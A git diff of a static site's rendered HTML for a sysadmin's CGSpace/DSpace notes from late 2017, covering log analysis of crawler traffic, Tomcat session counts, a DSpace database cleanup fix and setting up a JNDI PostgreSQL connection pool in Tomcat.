<pre><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>I&rsquo;m wondering if REST works differently, or just doesn&rsquo;t log these sessions?</li>
@ -861,7 +861,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)</li>
<li>I also noticed that CGNET appears to be monitoring the old domain every few minutes:</li>
</ul>
<pre><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &quot;HEAD / HTTP/1.1&quot; 301 0 &quot;-&quot; &quot;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&quot;
<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &#34;HEAD / HTTP/1.1&#34; 301 0 &#34;-&#34; &#34;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&#34;
</code></pre><ul>
<li>I should probably tell CGIAR people to have CGNET stop that</li>
</ul>
@ -870,7 +870,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM</li>
<li>Yet another mystery because the load for all domains looks fine at that time:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;26/Nov/2017:0[567]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;26/Nov/2017:0[567]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 66.249.66.83
195 104.196.152.243
220 40.77.167.82
@ -887,7 +887,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>About an hour later Uptime Robot said that the server was down</li>
<li>Here are all the top XMLUI and REST users from today:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;29/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;29/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
540 66.249.66.83
659 40.77.167.36
663 157.55.39.214
@ -905,14 +905,14 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>I don&rsquo;t see much activity in the logs but there are 87 PostgreSQL connections</li>
<li>But shit, there were 10,000 unique Tomcat sessions today:</li>
</ul>
<pre><code>$ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
10037
</code></pre><ul>
<li>Although maybe that&rsquo;s not much, as the previous two days had more:</li>
</ul>
<pre><code>$ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
12377
$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ cat dspace.log.2017-11-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
16984
</code></pre><ul>
<li>I think we just need start increasing the number of allowed PostgreSQL connections instead of fighting this, as it&rsquo;s the most common source of crashes we have</li>
@ -944,15 +944,15 @@ $ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | u
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ The logs say &ldquo;Timeout waiting for idle object&rdquo;
PostgreSQL activity says there are 115 connections currently
The list of connections to XMLUI and REST API for today:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -60,12 +60,12 @@ The list of connections to XMLUI and REST API for today:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -111,7 +111,7 @@ The list of connections to XMLUI and REST API for today:
<p class="blog-post-meta">
<time datetime="2017-12-01T13:53:54+03:00">Fri Dec 01, 2017</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -123,7 +123,7 @@ The list of connections to XMLUI and REST API for today:
<li>PostgreSQL activity says there are 115 connections currently</li>
<li>The list of connections to XMLUI and REST API for today:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
763 2.86.122.76
907 207.46.13.94
1018 157.55.39.206
@ -137,12 +137,12 @@ The list of connections to XMLUI and REST API for today:
</code></pre><ul>
<li>The number of DSpace sessions isn&rsquo;t even that high:</li>
</ul>
<pre><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
5815
</code></pre><ul>
<li>Connections in the last two hours:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017:(09|10)&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017:(09|10)&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
78 93.160.60.22
101 40.77.167.122
113 66.249.66.70
@ -157,18 +157,18 @@ The list of connections to XMLUI and REST API for today:
<li>What the fuck is going on?</li>
<li>I&rsquo;ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:</li>
</ul>
<pre><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
822
</code></pre><ul>
<li>Appears to be some new bot:</li>
</ul>
<pre><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &quot;GET /handle/10568/78444?show=full HTTP/1.1&quot; 200 29307 &quot;-&quot; &quot;Mozilla/3.0 (compatible; Indy Library)&quot;
<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &#34;GET /handle/10568/78444?show=full HTTP/1.1&#34; 200 29307 &#34;-&#34; &#34;Mozilla/3.0 (compatible; Indy Library)&#34;
</code></pre><ul>
<li>I restarted Tomcat and everything came back up</li>
<li>I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the useragent in nginx</li>
<li>I will also add &lsquo;Drupal&rsquo; to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | grep Drupal | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
3 54.75.205.145
6 70.32.83.92
14 2a01:7e00::f03c:91ff:fe18:7396
@ -206,7 +206,7 @@ The list of connections to XMLUI and REST API for today:
<li>I don&rsquo;t see any errors in the DSpace logs but I see in nginx&rsquo;s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)</li>
<li>Looking at the REST API logs I see some new client IP I haven&rsquo;t noticed before:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;6/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;6/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
18 95.108.181.88
19 68.180.229.254
30 207.46.13.151
@ -228,7 +228,7 @@ The list of connections to XMLUI and REST API for today:
<li>I looked just now and see that there are 121 PostgreSQL connections!</li>
<li>The top users right now are:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;7/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;7/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
838 40.77.167.11
939 66.249.66.223
1149 66.249.66.206
@ -243,24 +243,24 @@ The list of connections to XMLUI and REST API for today:
<li>We&rsquo;ve never seen 124.17.34.60 yet, but it&rsquo;s really hammering us!</li>
<li>Apparently it is from China, and here is one of its user agents:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)
</code></pre><ul>
<li>It is responsible for 4,500 Tomcat sessions today alone:</li>
</ul>
<pre><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
4574
</code></pre><ul>
<li>I&rsquo;ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it&rsquo;s the same bot on the same subnet</li>
<li>I was running the DSpace cleanup task manually and it hit an error:</li>
</ul>
<pre><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(144666) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(144666) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is like I discovered in <a href="/cgspace-notes/2017-04">2017-04</a>, to set the <code>primary_bitstream_id</code> to null:</li>
</ul>
<pre><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
UPDATE 1
</code></pre><h2 id="2017-12-13">2017-12-13</h2>
<ul>
@ -294,12 +294,12 @@ UPDATE 1
</li>
<li>I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the <code>collection</code> field)</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
</code></pre><ul>
<li>It&rsquo;s the same on DSpace Test, I can&rsquo;t import the SAF bundle without specifying the collection:</li>
</ul>
<pre><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
No collections given. Assuming 'collections' file inside item directory
<pre tabindex="0"><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
No collections given. Assuming &#39;collections&#39; file inside item directory
Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
Generating mapfile: /tmp/ccafs.map
Processing collections file: collections
@ -321,14 +321,14 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>I even tried to debug it by adding verbose logging to the <code>JAVA_OPTS</code>:</li>
</ul>
<pre><code>-Dlog4j.configuration=file:/Users/aorth/dspace/config/log4j-console.properties -Ddspace.log.init.disable=true
<pre tabindex="0"><code>-Dlog4j.configuration=file:/Users/aorth/dspace/config/log4j-console.properties -Ddspace.log.init.disable=true
</code></pre><ul>
<li>&hellip; but the error message was the same, just with more INFO noise around it</li>
<li>For now I&rsquo;ll import into a collection in DSpace Test but I&rsquo;m really not sure what&rsquo;s up with this!</li>
<li>Linode alerted that CGSpace was using high CPU from 4 to 6 PM</li>
<li>The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
671 66.249.66.70
885 95.108.181.88
904 157.55.39.96
@ -342,7 +342,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
33 68.180.229.254
48 157.55.39.96
51 157.55.39.179
@ -371,7 +371,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted this morning that there was high outbound traffic from 6 to 8 AM</li>
<li>The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 207.46.13.146
191 197.210.168.174
202 86.101.203.216
@ -385,7 +385,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
7 104.198.9.108
8 185.29.8.111
8 40.77.167.176
@ -402,7 +402,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM</li>
<li>The REST and OAI API logs look pretty much the same as earlier this morning, but there&rsquo;s a new IP harvesting XMLUI:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
360 95.108.181.88
477 66.249.66.90
526 86.101.203.216
@ -416,17 +416,17 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>2.86.72.181 appears to be from Greece, and has the following user agent:</li>
</ul>
<pre><code>Mozilla/3.0 (compatible; Indy Library)
<pre tabindex="0"><code>Mozilla/3.0 (compatible; Indy Library)
</code></pre><ul>
<li>Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:</li>
</ul>
<pre><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>I guess there&rsquo;s nothing I can do to them for now</li>
<li>In other news, I am curious how many PostgreSQL connection pool errors we&rsquo;ve had in the last month:</li>
</ul>
<pre><code>$ grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-1* | grep -v :0
<pre tabindex="0"><code>$ grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-1* | grep -v :0
dspace.log.2017-11-07:15695
dspace.log.2017-11-08:135
dspace.log.2017-11-17:1298
@ -456,7 +456,7 @@ dspace.log.2017-12-07:2769
<li>So I restarted Tomcat 7 and restarted the imports</li>
<li>I assume the PostgreSQL transactions were fine but I will remove the Discovery index for their community and re-run the light-weight indexing to hopefully re-construct everything:</li>
</ul>
<pre><code>$ dspace index-discovery -r 10568/42211
<pre tabindex="0"><code>$ dspace index-discovery -r 10568/42211
$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
</code></pre><ul>
<li>The PostgreSQL issues are getting out of control, I need to figure out how to enable connection pools in Tomcat!</li>
@ -476,7 +476,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>I re-deployed the <code>5_x-prod</code> branch on CGSpace, applied all system updates, and restarted the server</li>
<li>Looking through the dspace.log I see this error:</li>
</ul>
<pre><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I don&rsquo;t have time now to look into this but the Solr sharding has long been an issue!</li>
<li>Looking into using JDBC / JNDI to provide a database pool to DSpace</li>
@ -484,28 +484,28 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>First, I uncomment <code>db.jndi</code> in <em>dspace/config/dspace.cfg</em></li>
<li>Then I create a global <code>Resource</code> in the main Tomcat <em>server.xml</em> (inside <code>GlobalNamingResources</code>):</li>
</ul>
<pre><code>&lt;Resource name=&quot;jdbc/dspace&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspace&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='50'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspace&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspace&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;50&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>Most of the parameters are from comments by Mark Wood about his JNDI setup: <a href="https://jira.duraspace.org/browse/DS-3564">https://jira.duraspace.org/browse/DS-3564</a></li>
<li>Then I add a <code>ResourceLink</code> to each web application context:</li>
</ul>
<pre><code>&lt;ResourceLink global=&quot;jdbc/dspace&quot; name=&quot;jdbc/dspace&quot; type=&quot;javax.sql.DataSource&quot;/&gt;
<pre tabindex="0"><code>&lt;ResourceLink global=&#34;jdbc/dspace&#34; name=&#34;jdbc/dspace&#34; type=&#34;javax.sql.DataSource&#34;/&gt;
</code></pre><ul>
<li>I am not sure why several guides show configuration snippets for <em>server.xml</em> and web application contexts that use a Local and Global jdbc&hellip;</li>
<li>When DSpace can&rsquo;t find the JNDI context (for whatever reason) you will see this in the dspace logs:</li>
</ul>
<pre><code>2017-12-19 13:12:08,796 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
<pre tabindex="0"><code>2017-12-19 13:12:08,796 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Context. Unable to find [jdbc].
at org.apache.naming.NamingContext.lookup(NamingContext.java:825)
at org.apache.naming.NamingContext.lookup(NamingContext.java:173)
@ -535,11 +535,11 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>And indeed the Catalina logs show that it failed to set up the JDBC driver:</li>
</ul>
<pre><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class &#39;org.postgresql.Driver&#39;
</code></pre><ul>
<li>There are several copies of the PostgreSQL driver installed by DSpace:</li>
</ul>
<pre><code>$ find ~/dspace/ -iname &quot;postgresql*jdbc*.jar&quot;
<pre tabindex="0"><code>$ find ~/dspace/ -iname &#34;postgresql*jdbc*.jar&#34;
/Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
@ -548,7 +548,7 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>These apparently come from the main DSpace <code>pom.xml</code>:</li>
</ul>
<pre><code>&lt;dependency&gt;
<pre tabindex="0"><code>&lt;dependency&gt;
&lt;groupId&gt;postgresql&lt;/groupId&gt;
&lt;artifactId&gt;postgresql&lt;/artifactId&gt;
&lt;version&gt;9.1-901-1.jdbc4&lt;/version&gt;
@ -556,13 +556,13 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>So WTF? Let&rsquo;s try copying one to Tomcat&rsquo;s lib folder and restarting Tomcat:</li>
</ul>
<pre><code>$ cp ~/dspace/lib/postgresql-9.1-901-1.jdbc4.jar /usr/local/opt/tomcat@7/libexec/lib
<pre tabindex="0"><code>$ cp ~/dspace/lib/postgresql-9.1-901-1.jdbc4.jar /usr/local/opt/tomcat@7/libexec/lib
</code></pre><ul>
<li>Oh that&rsquo;s fantastic, now at least Tomcat doesn&rsquo;t print an error during startup so I guess it succeeds to create the JNDI pool</li>
<li>DSpace starts up but I have no idea if it&rsquo;s using the JNDI configuration because I see this in the logs:</li>
</ul>
<pre><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is &#39;{}&#39;PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is &#39;{}&#39;9.5.10
2017-12-19 13:26:54,293 INFO org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
